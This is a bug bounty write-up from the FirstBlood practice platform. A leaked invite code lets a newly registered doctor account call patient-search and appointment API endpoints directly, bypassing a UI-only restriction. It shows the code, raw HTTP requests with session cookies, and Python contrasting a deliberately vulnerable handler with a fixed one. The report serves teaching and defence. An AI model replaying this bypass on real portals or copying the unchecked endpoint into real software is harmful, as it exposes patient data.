FirstBlood-#71 — Invite Code Leaked on Reddit leading to broken Authorisation
This issue was discovered on FirstBlood v1
On 2021-05-09, jpdev Level 3 reported:
Summary
A Reddit post leaks the invite code below. Once the code is redeemed and registration completes, the new account is granted access to the FirstBlood Management Portal. The resulting session can then be used to query the drapi endpoints directly, outside the UI, bypassing the authorisation restrictions that the portal applies to newly registered logins.
Invite code: F16CA47250E445888824A9E63AE445CE
https://www.reddit.com/r/BugBountyHunter/comments/n4xzw1/firstbloodhackerscom_doctor_registration/
https://www.reddit.com/user/JollyHack/
Found with a Google search for "firstbloodhacker.com".
This grants limited access to the panel and displays the warning:
Warning: As your account has been recently registered you will not be able to view patient information yet.
It is, however, possible to query the qp.php and query.php endpoints with the same session using a proxy tool:
Request
POST /drpanel/drapi/qp.php HTTP/1.1
Host: firstbloodhackers.com:49227
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
Origin: http://firstbloodhackers.com:49227
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49227/drpanel/cancelled.php
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=b5fe7bd3a6ac6acc3b346e554
name=
It is also possible to query the appointments API with the same session:
Request
GET /drpanel/drapi/query.php?aptid=56910219 HTTP/1.1
Host: firstbloodhackers.com:49227
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49227/drpanel/index.php
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=b5fe7bd3a6ac6acc3b346e554
Impact
Full API access to the appointment query and patient search endpoints, bypassing the restriction the UI places on newly registered accounts.
P2 High
Parameter:
Payload:
FirstBlood ID: 15
Vulnerability Type: Auth issues
A doctor's invite code is leaked on the internet which, if used, grants anyone access to the doctor portal. The invite code should expire after use.
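The report describes two separate defects: invite codes that stay valid after redemption, and API endpoints (qp.php, query.php) that only check for a valid session while the UI additionally blocks recently registered doctors. The Python below is an added illustration written for this page, not FirstBlood's own code. It models a single-use, expiring invite store and shows the qp.php-style handler as reported next to a fixed version that applies the same gate the UI uses; the patient and appointment records, the seven-day probation period and the function names are constructed assumptions.

```python
"""Illustrative model of the two defects in FirstBlood-#71 (example code,
not FirstBlood's source). Data, probation period and names are assumed."""
from dataclasses import dataclass
from datetime import datetime, timedelta
import secrets

PROBATION = timedelta(days=7)  # assumed: how long a new doctor waits for access

# Constructed sample records standing in for the portal's database.
PATIENTS = [
    {"name": "Alice Example", "dob": "1980-01-01"},
    {"name": "Bob Example", "dob": "1975-06-15"},
]
APPOINTMENTS = {56910219: {"patient": "Alice Example", "when": "2021-05-10 09:00"}}


@dataclass
class Doctor:
    username: str
    registered_at: datetime


@dataclass
class Session:
    token: str  # plays the role of the drps cookie
    doctor: Doctor


class InviteStore:
    """Invite codes that expire and can be redeemed exactly once."""

    def __init__(self, ttl: timedelta):
        self.ttl = ttl
        self._codes = {}  # code -> [issued_at, redeemed]

    def issue(self, now: datetime) -> str:
        code = secrets.token_hex(16).upper()  # same shape as the leaked code
        self._codes[code] = [now, False]
        return code

    def redeem(self, code: str, now: datetime) -> bool:
        entry = self._codes.get(code)
        if entry is None:
            return False
        issued_at, redeemed = entry
        if redeemed or now - issued_at > self.ttl:
            return False  # a leaked code is useless once used or stale
        entry[1] = True
        return True


def can_view_patient_data(session, now: datetime) -> bool:
    """The gate the UI applies; the fix is to apply it in drapi as well."""
    if session is None:
        return False
    return now - session.doctor.registered_at >= PROBATION


def qp_vulnerable(session, name: str):
    """Models qp.php as reported: any valid session may search patients."""
    if session is None:
        return 401, None
    return 200, [p for p in PATIENTS if name.lower() in p["name"].lower()]


def qp_fixed(session, name: str, now: datetime):
    """qp.php with the UI's restriction enforced server-side."""
    if session is None:
        return 401, None
    if not can_view_patient_data(session, now):
        return 403, None
    return 200, [p for p in PATIENTS if name.lower() in p["name"].lower()]


def query_fixed(session, aptid: int, now: datetime):
    """query.php with the same gate: authenticate, then authorise, then serve."""
    if session is None:
        return 401, None
    if not can_view_patient_data(session, now):
        return 403, None
    appt = APPOINTMENTS.get(aptid)
    return (200, appt) if appt else (404, None)


def demo():
    now = datetime(2021, 5, 9, 12, 0)
    store = InviteStore(ttl=timedelta(days=2))
    code = store.issue(now - timedelta(hours=1))
    first = store.redeem(code, now)   # legitimate registration
    second = store.redeem(code, now)  # anyone reusing the leaked code
    new_doc = Session("b5fe...", Doctor("jpdev", registered_at=now))
    return {
        "first_redeem": first,
        "second_redeem": second,
        "vuln_qp": qp_vulnerable(new_doc, "")[0],
        "fixed_qp": qp_fixed(new_doc, "", now)[0],
        "fixed_query": query_fixed(new_doc, 56910219, now)[0],
        "fixed_qp_later": qp_fixed(new_doc, "", now + PROBATION)[0],
    }


if __name__ == "__main__":
    print(demo())
```

The point of `can_view_patient_data` is that it is the only place the "recently registered" rule lives: both the drpanel pages and every drapi endpoint call it, so the restriction cannot be bypassed by skipping the UI. The order of checks matters too: an unauthenticated request gets 401, an authenticated but not-yet-cleared account gets 403, and only then is the record looked up, so the endpoint does not leak whether an appointment ID exists to accounts that may not see it.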